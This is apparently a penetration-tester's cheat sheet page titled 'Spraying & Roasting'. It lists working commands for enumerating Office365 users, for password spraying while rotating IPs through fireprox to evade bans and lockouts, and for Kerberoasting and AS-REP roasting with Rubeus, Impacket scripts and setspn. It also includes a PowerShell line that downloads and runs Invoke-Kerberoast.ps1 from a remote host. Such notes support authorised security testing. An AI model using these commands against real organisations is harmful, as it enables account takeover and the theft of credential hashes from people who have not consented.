Comment on page
Spraying & Roasting
Search for emails, based on tech stack, default usernames, OSINT information etc., then enumerate which ones are valid with https://github.com/LMGsec/o365creeper . This does not cause logs to be written or lockouts to be triggered, so it is pretty safe to do.
Use https://github.com/dafthack/MSOLSpray to Spray vs Office365. To not get banned by microsoft, using https://github.com/ustayready/fireprox as described on the MSOLSpray repo is advised, which will use an AWS API Gateway to rotate the IPs you are accessing from. An incrementing time based lockout occurs after 10 attempts per account, so be careful.
Ideally this will result in at least 1 valid user account.
kerbrute passwordspray -d domain.local --dc dcip users.txt <password to spray>
atomizer.py owa mail.domain.local <password to spray> -emails.txt
Make sure your time + timezone and the targets time are in sync, kerberos is very time sensitive. You can view the time on windows with
tzdate /g or on Linux rdate -n <targetip>Rubeus kerberoast /format:hashcat
GetUserSPNs.py <domain>/<username>:<password> -outputfile <outfile>
Add-Type -AssemblyName System.IdentityModel
setspn.exe -T <domain> -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System. IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }
powershell.exe -Command 'IEX (New-Object Net.Webclient).DownloadString("http://<ip>:<port>/Invoke-Kerberoast.ps1");Invoke-Kerberoast -OutputFormat Hashcat
Without credentials for a list of users:
GetNPUsers.py <domain>/ -usersfile users.txt -format hashcat -outputfile <outfile> -dc-ip <>
With credentials for all users:
GetNPUsers.py <domain>/<username>:<password> -request -format hashcat -outputfile <outfile>
Last modified 9mo ago